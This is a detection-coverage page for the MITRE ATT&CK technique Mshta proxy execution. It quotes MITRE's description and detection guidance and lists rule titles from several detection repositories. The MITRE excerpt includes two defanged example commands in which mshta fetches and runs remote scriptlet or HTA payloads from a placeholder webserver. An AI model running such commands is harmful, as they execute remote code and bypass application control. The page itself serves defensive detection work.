Cross-source coverage
T1218.005 / ATT&CK
System Binary Proxy Execution: Mshta
75 rules · 73 families across 6 sources.
3 deprecated hidden · include
From MITRE ATT&CK 19.2
Adversaries may abuse mshta.exe to proxy execution of malicious.hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.
- Tactics
- Stealth
- Platforms
- Windows
- Telemetry
-
WinEventLog:SecurityWinEventLog:Sysmon
How MITRE says to detect it DET0506
Detecting Mshta-based Proxy Execution via Suspicious HTA or Script Invocation
Windows Analytic 1397
Detection of mshta.exe execution where command-line arguments reference remote or local HTA/script content (VBScript/JScript) followed by subsequent file creation, network retrieval, or process spawning that indicates payload execution outside standard Internet Explorer security context. Correlation includes parent process lineage, command-line inspection, and network connection creation to untrusted or anomalous endpoints.
WinEventLog:SecurityEventCode=4688WinEventLog:SysmonEventCode=3, 22WinEventLog:SysmonEventCode=11
elastic/detection-rules
26 rules| Detection | Severity | Format |
|---|---|---|
| Command and Scripting Interpreter via Windows Scripts | High | Elastic TOML |
| Incoming DCOM Lateral Movement via MSHTA | High | Elastic TOML |
| Potential Execution via FileFix Phishing Attack | High | Elastic TOML |
| Potential Fake CAPTCHA Phishing Attack | High | Elastic TOML |
| Script Execution via Microsoft HTML Application | High | Elastic TOML |
| Suspicious Managed Code Hosting Process | High | Elastic TOML |
| Suspicious Microsoft HTML Application Child Process | High | Elastic TOML |
| Suspicious Windows Command Shell Arguments | High | Elastic TOML |
| Execution from Unusual Directory - Command Line | Medium | Elastic TOML |
| Execution of a Downloaded Windows Script | Medium | Elastic TOML |
+ 16 more from elastic/detection-rules → showing the 10 highest-severity
elastic/protections-artifacts
24 rules| Detection | Severity | Format |
|---|---|---|
| BCDEdit Safe Mode Command Execution | Undefined | Elastic TOML |
| Execution of a Downloaded Windows Script via Explorer | Undefined | Elastic TOML |
| Execution of a File Downloaded via Windows OpenSSH | Undefined | Elastic TOML |
| Execution of a File Written by a Signed Binary Proxy | Undefined | Elastic TOML |
| Execution of a Windows Script Downloaded from the Internet | Undefined | Elastic TOML |
| Execution of a Windows Script Downloaded via a LOLBIN | Undefined | Elastic TOML |
| Execution of a Windows Script File Written by a Suspicious Process | Undefined | Elastic TOML |
| Execution of Commonly Abused Utilities via Explorer Trampoline | Undefined | Elastic TOML |
| Execution via a Suspicious WMI Client | Undefined | Elastic TOML |
| Execution via Outlook Application COM Object | Undefined | Elastic TOML |
+ 14 more from elastic/protections-artifacts → showing the 10 highest-severity
splunk/security_content
12 rules| Detection | Severity | Format |
|---|---|---|
| Cisco NVM - MSHTML or MSHTA Network Execution Without URL in CLI | Undefined | SPL |
| Cisco NVM - Rundll32 Abuse of MSHTML.DLL for Payload Download | Undefined | SPL |
| Detect mshta inline hta execution | Undefined | SPL |
| Detect mshta renamed | Undefined | SPL |
| Detect MSHTA Url in Command Line | Undefined | SPL |
| Detect Rundll32 Inline HTA Execution | Undefined | SPL |
| Mshta spawning Rundll32 OR Regsvr32 Process | Undefined | SPL |
| Suspicious mshta child process | Undefined | SPL |
| Suspicious mshta spawn | Undefined | SPL |
| Windows Mshta Execution In Registry | Undefined | SPL |
+ 2 more from splunk/security_content → showing the 10 highest-severity
SigmaHQ/sigma
8 rules| Detection | Severity | Format |
|---|---|---|
| Csc.EXE Execution Form Potentially Suspicious Parent | High | Sigma |
| HackTool - CACTUSTORCH Remote Thread Creation | High | Sigma |
| MSHTA Execution with Suspicious File Extensions | High | Sigma |
| Potential Baby Shark Malware Activity | High | Sigma |
| Potential LethalHTA Technique Execution | High | Sigma |
| Remotely Hosted HTA File Executed Via Mshta.EXE | High | Sigma |
| Suspicious JavaScript Execution Via Mshta.EXE | High | Sigma |
| Suspicious MSHTA Child Process | High | Sigma |
Bert-JanP/Hunting-Queries-Detection-Rules
3 rules| Detection | Severity | Format |
|---|---|---|
| MITRE ATT&CK Mapping | Undefined | KQL |
| MSHTA Executions | Undefined | KQL |
| Outbound MSHTA Connection | Undefined | KQL |
Wazuh Core Ruleset
2 rules| Detection | Severity | Format |
|---|---|---|
| Office application started mshta.exe and executed scripting command | Critical | Wazuh XML |
| Office application started mshta.exe | High | Wazuh XML |